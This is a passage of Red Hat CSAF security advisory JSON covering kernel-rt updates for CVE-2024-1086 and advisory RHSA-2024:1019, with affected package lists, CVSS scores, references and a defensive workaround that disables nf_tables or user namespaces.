"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-1086"
},
{
"category": "external",
"summary": "RHBZ#2262126",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262126"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-1086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1086"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1086"
},
{
"category": "external",
"summary": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660",
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"category": "external",
"summary": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660",
"url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2024-01-31T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-04-02T17:26:48+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1614"
},
{
"category": "workaround",
"details": "1. This flaw can be mitigated by preventing the affected netfilter (nf_tables) kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.\n\n2. If the module cannot be disabled, on non-containerized deployments of Red Hat Enterprise Linux, the mitigation is to disable user namespaces:\n```\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n```\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use the second mitigation (disabling user namespaces) as the functionality is needed to be enabled. The first mitigation (blacklisting nf_tables) is still viable for containerized deployments, providing the environment is not using netfilter.",
"product_ids": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"NFV-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"NFV-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.src",
"RT-8.9.0.Z.MAIN:kernel-rt-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-core-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debug-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-debuginfo-common-x86_64-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-devel-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-kvm-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64",
"RT-8.9.0.Z.MAIN:kernel-rt-modules-extra-0:4.18.0-513.24.1.rt7.326.el8_9.x86_64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2024-05-30T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Important"
}
],
"title": "kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function"
}
]
}
rhsa-2024_1019
Vulnerability from csaf_redhat
Published
2024-02-28 12:36
Modified
2024-11-24 11:55
Summary
Red Hat Security Advisory: kernel-rt security update
Notes
Topic
An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)
* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)
* kernel: netfilter: use-after-free in nft_trans_gc_catchall_sync leads to privilege escalation (CVE-2024-0193)
* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)
* kernel: Use-after-free in nft_verdict_dump due to a race between set GC and transaction (CVE-2023-4244)
* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event's read_size (CVE-2023-6931)
* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)
* kernel: use-after-free during a race condition between a nonblocking atomic commit and a driver unload in drivers/gpu/drm/drm_atomic.c (CVE-2023-51043)
* kernel: nf_tables: use-after-free vulnerability in the nft_setelem_catchall_deactivate() function (CVE-2024-1085)
* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for kernel-rt is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)\n\n* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)\n\n* kernel: netfilter: use-after-free in nft_trans_gc_catchall_sync leads to privilege escalation (CVE-2024-0193)\n\n* kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)\n\n* kernel: Use-after-free in nft_verdict_dump due to a race between set GC and transaction (CVE-2023-4244)\n\n* kernel: Out of boundary write in perf_read_group() as result of overflow a perf_event\u0027s read_size (CVE-2023-6931)\n\n* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)\n\n* kernel: use-after-free during a race condition between a nonblocking atomic commit and a driver unload in drivers/gpu/drm/drm_atomic.c (CVE-2023-51043)\n\n* kernel: nf_tables: use-after-free vulnerability in the nft_setelem_catchall_deactivate() function (CVE-2024-1085)\n\n* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:1019",
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "2235306",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2235306"
},
{
"category": "external",
"summary": "2252731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2252731"
},
{
"category": "external",
"summary": "2255139",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255139"
},
{
"category": "external",
"summary": "2255498",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"category": "external",
"summary": "2255653",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255653"
},
{
"category": "external",
"summary": "2259866",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259866"
},
{
"category": "external",
"summary": "2260005",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260005"
},
{
"category": "external",
"summary": "2262126",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262126"
},
{
"category": "external",
"summary": "2262127",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262127"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_1019.json"
}
],
"title": "Red Hat Security Advisory: kernel-rt security update",
"tracking": {
"current_release_date": "2024-11-24T11:55:23+00:00",
"generator": {
"date": "2024-11-24T11:55:23+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2024:1019",
"initial_release_date": "2024-02-28T12:36:50+00:00",
"revision_history": [
{
"date": "2024-02-28T12:36:50+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-02-28T12:36:50+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-24T11:55:23+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product": {
"name": "Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.2::realtime"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product": {
"name": "Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_eus:9.2::nfv"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"product": {
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"product_id": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@5.14.0-284.55.1.rt14.340.el9_2?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-core@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-core@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-devel@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-kvm@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-core@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-modules-extra@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-devel@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-kvm@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-core@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
